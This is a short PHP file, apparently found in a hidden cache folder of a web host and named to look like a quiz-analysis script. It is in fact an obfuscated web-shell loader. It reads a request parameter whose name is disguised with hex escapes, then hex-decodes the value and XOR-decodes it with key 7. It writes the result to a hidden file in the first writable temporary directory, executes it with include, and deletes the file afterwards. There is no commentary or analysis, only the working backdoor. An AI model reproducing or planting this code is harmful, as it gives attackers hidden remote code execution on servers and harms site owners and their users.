File: /home/burhbrzf/public_html/.cache_f/quiz_analysis.php
<?php
if(@$_REQUEST["e\x6E\x74ry"] !== null){
$record = hex2bin($_REQUEST["e\x6E\x74ry"]);
$data_chunk='' ;$j = 0; while($j < strlen($record)){$data_chunk .= chr(ord($record[$j]) ^ 7);$j++;}
$obj = array_filter(["/dev/shm", sys_get_temp_dir(), "/var/tmp", getenv("TEMP"), "/tmp", session_save_path(), getenv("TMP"), ini_get("upload_tmp_dir"), getcwd()]);
$token = 0;
do {
$sym = $obj[$token] ?? null;
if ($token >= count($obj)) break;
if (!!is_dir($sym) && !!is_writable($sym)) {
$reference = "$sym" . "/.symbol";
$success = file_put_contents($reference, $data_chunk);
if ($success) {
include $reference;
@unlink($reference);
die();}
}
$token++;
} while (true);
}